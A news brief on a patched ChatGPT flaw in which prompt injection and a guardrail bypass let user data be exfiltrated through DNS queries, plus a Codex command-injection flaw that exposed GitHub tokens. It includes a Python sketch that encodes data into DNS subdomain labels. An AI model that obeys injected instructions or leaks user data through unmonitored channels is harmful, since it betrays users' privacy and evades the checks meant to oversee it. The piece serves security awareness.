ChatGPT Flaw: Data Stolen Via DNS Abuse
31 Mar
Summary
- A ChatGPT flaw enabled silent data theft using DNS abuse.
- Attackers bypassed ChatGPT guardrails to exfiltrate user data.
- OpenAI patched the vulnerability on February 20, 2026.

Security researchers have identified a critical vulnerability in ChatGPT that permitted the covert exfiltration of sensitive user data. The flaw, uncovered by Check Point Research, combined prompt injection with a bypass of the AI's built-in guardrails. The attack leveraged DNS abuse, a channel not typically flagged as risky, to encode stolen information within domain queries.
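To make the encoding idea concrete, here is a minimal, hypothetical sketch of how arbitrary data can be smuggled into DNS lookups by packing it into subdomain labels. This is an illustration of the general DNS-exfiltration technique, not the actual exploit; the domain name and function are invented for the example, and no queries are actually sent.

```python
import binascii

# Hypothetical attacker-controlled zone; its authoritative nameserver
# would see every query for subdomains of this domain.
ATTACKER_DOMAIN = "exfil.example.com"

# DNS limits each label (dot-separated segment) to 63 octets (RFC 1035).
MAX_LABEL = 63

def encode_as_dns_names(data: bytes, domain: str = ATTACKER_DOMAIN) -> list[str]:
    """Hex-encode data and split it into DNS-legal hostnames.

    Resolving each name would leak one chunk of the payload through the
    attacker's DNS query logs, with no HTTP request ever being made.
    """
    hex_payload = binascii.hexlify(data).decode("ascii")
    chunks = [hex_payload[i:i + MAX_LABEL]
              for i in range(0, len(hex_payload), MAX_LABEL)]
    return [f"{chunk}.{domain}" for chunk in chunks]

# Example: a short secret becomes one innocuous-looking hostname.
names = encode_as_dns_names(b"user@example.com")
```

Because the payload travels as ordinary name-resolution traffic rather than as an outbound web request, security controls that only monitor URL sharing or HTTP egress never see it, which is exactly the blind spot described below.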
This approach created a significant blind spot: ChatGPT's standard security protocols did not treat DNS activity as a data-sharing risk, so user data could be extracted without triggering alerts or requiring consent. OpenAI addressed the issue, deploying a patch on February 20, 2026.
This incident follows another significant vulnerability addressed by OpenAI earlier in the week, which affected ChatGPT Codex. That flaw involved command injection, enabling the theft of sensitive GitHub authentication tokens. Both discoveries underscore the evolving security landscape surrounding advanced AI tools.